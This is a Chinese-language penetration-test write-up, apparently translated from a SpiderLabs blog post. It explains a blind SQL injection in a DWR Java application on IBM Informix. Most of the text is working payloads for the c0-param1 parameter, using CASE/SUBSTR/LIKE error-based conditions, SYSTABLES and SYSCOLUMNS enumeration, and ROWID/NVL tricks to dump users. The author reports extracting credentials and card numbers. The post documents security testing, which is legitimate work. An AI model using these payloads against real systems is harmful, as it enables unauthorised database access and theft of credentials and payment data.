在最近的应用程序渗透测试中,我发现一个有意思的sql漏洞(SQLI中)。
SQLI出现这种情况的原因:
1.开发中带来的问题
2.数据库正在使用
下面,我来介绍我遇到的问题以及如何解决并dump数据库。该应用程序使用一种名为DWR后端的JAVA远程调用框架,系统调用是这样的:
这是位于C0-param1的参数,从表面上看起来很容易,因为它给了详细的错误信息,当一个单引号被添加到参数尾部时,会得到以下错误信息:“java.sql.SQLException: A syntax error has occurred.”(语法错误)
c0-param1参数控制有多少结果从数据库中检索出来,这注射点出现在类似于mssql的TOP keyword位置和MYSQL的Limit。我认为SQLI跑MSSQL库比MYSQL更合适。我添加一系列请求如下图所示:
执行查询后,得到一个错误信息:“java.sql.SQLException: The column (card_no) must be in the GROUP BY list.”数据库系统是IBM的Informix,我对Informix了解甚少,所以还得一个函数一个函数地查IBM的文档。
现在知道这是Informix,能帮助我们对次注射是怎么产生的,第一个子句,类似TOP和LIMIT,查询起来是这样的:
c0-param1=string:10 (CASE WHEN SUBSTR((SELECT USER FROM SYSTABLES WHERE TABID = 1), 1, 1) = 'a' THEN 1 ELSE (SELECT 1 FROM SYSTABLES) END),
如果条件为真(即当前用户名的第一个字母为'a'),查询将返回结果,反则会报错,因为子查询(SELECT 1 FROM SYSTABLES)会返回多个结果。然而,又有难题了,不能使用等号,通过替换,使用以下语句:
c0-param1=string:10 (CASE WHEN SUBSTR((SELECT USER FROM SYSTABLES WHERE TABID > 0 AND TABID < 2), 1, 1) LIKE 'a' THEN 1 ELSE (SELECT 1 FROM SYSTABLES) END),
有了这些注射知识和概念就好整多了,掏出sqlmap(从我的同事那里弄到了些小技巧,而且观摩了他的帖子“Sqlmap的高级注入技巧”),Sqlmap的确是很好的工具,作者是今年在大会上认识的一个很不错的家伙写的。。。好像跑题了。不过遗憾的是,Sqlmap不支持Informix,所以我不得不自己写工具了:
获取表名的长度:
c0-param1=string:10 (CASE WHEN CHAR_LENGTH((SELECT TABNAME FROM SYSTABLES WHERE TABID > 0 AND TABID < 2)) > 1 THEN 1 ELSE (SELECT 1 FROM SYSTABLES) END),
获取表名:
c0-param1=string:10 (CASE WHEN SUBSTR((SELECT TABNAME FROM SYSTABLES WHERE TABID > 0 AND TABID < 2), 1, 1) LIKE 'a' THEN 1 ELSE (SELECT 1 FROM SYSTABLES) END),
获取有表中有多少列:
c0-param1=string:10 (CASE WHEN (SELECT NCOLS FROM SYSTABLES WHERE TABID > 0 AND TABID < 2) > 1 THEN 1 ELSE (SELECT 1 FROM SYSTABLES) END),
获取列名长度:
c0-param1=string:10 (CASE WHEN CHAR_LENGTH((SELECT COLNAME FROM SYSCOLUMNS WHERE (TABID > 0 AND TABID < 2) AND (COLNO > 0 AND COLNO < 2))) > 1 THEN 1 ELSE (SELECT 1 FROM SYSTABLES) END),
获取列名:
c0-param1=string:10 (CASE WHEN SUBSTR((SELECT COLNAME FROM SYSCOLUMNS WHERE (TABID > 0 AND TABID < 2) AND (COLNO > 0 AND COLNO < 2)), 1, 1) LIKE 'a' THEN 1 ELSE (SELECT 1 FROM SYSTABLES) END),
通过一个小研究,我发现Informix的表实际上有一个隐藏很深的列名:ROWID,每一行都存在一个这样的序列号。然而,这些ROWID可以分散,删除或插入到表。为了找到包含数据的ROWID,我调用一个名为NVL的函数,这个函数可以返回不同的结果,具体取决于第一个参数是否为NULL。最终找到一处可能总是包含数据的一列,语句:
c0-param1=string:10 (NVL((SELECT username FROM users WHERE ROWID > 0 AND ROWID < 2), (SELECT 1 FROM SYSTABLES))), c0-param1=string:10 (CASE WHEN SUBSTR((SELECT username FROM users WHERE ROWID > 0 AND ROWID < 1), 1, 1) LIKE 'a' THEN 1 ELSE (SELECT 1 FROM SYSTABLES) END),
通过这种方法,能够发现纯文本应用程序凭据,明文银行SFTP凭证和未加密的支付卡号码。
随着这一成功,明白了以前对Informix数据库想知道的。
原文地址:http://blog.spiderlabs.com/2013/12/the-case-of-an-obscure-injection.html